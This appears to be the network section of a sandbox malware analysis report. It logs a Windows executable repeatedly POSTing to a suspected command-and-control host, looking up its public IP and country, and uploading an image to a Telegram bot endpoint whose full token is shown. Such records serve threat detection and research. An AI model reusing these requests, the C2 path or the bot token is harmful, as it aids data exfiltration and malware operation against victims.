                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1692Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1000Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1008Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: windowsxp.topContent-Length: 1716Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: windowsxp.top Content-Length: 1692 Expect: 100-continue
                                    Source: global traffic HTTP traffic detected: POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: windowsxp.top Content-Length: 1704 Expect: 100-continue
                                    Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                                    Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
                                    Source: global traffic HTTP traffic detected: GET /country HTTP/1.1 Host: ipinfo.io
                                    Source: global traffic DNS traffic detected: DNS query: ipinfo.io
                                    Source: global traffic DNS traffic detected: DNS query: api.telegram.org
                                    Source: global traffic DNS traffic detected: DNS query: windowsxp.top
                                    Source: unknown HTTP traffic detected: POST /bot2088971373:AAFvpTb_CUPp2OYxd9kBl53Xnu14PH8bMfQ/sendPhoto HTTP/1.1 Content-Type: multipart/form-data; boundary="68d30593-7ba0-4754-ba4f-858b55a2ddb4" Host: api.telegram.org Content-Length: 74846 Expect: 100-continue Connection: Keep-Alive
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
                                    Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
                                    Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
                                    Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 49756 -> 443
                                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49756
                                    Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49736 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49738 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49749 version: TLS 1.2
                                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
                                    Source: C:\Recovery\AvdGjRxbXYfvkpkpztF.exe Window created: window name: CLIPBRDWNDCLASS

                                    System Summary

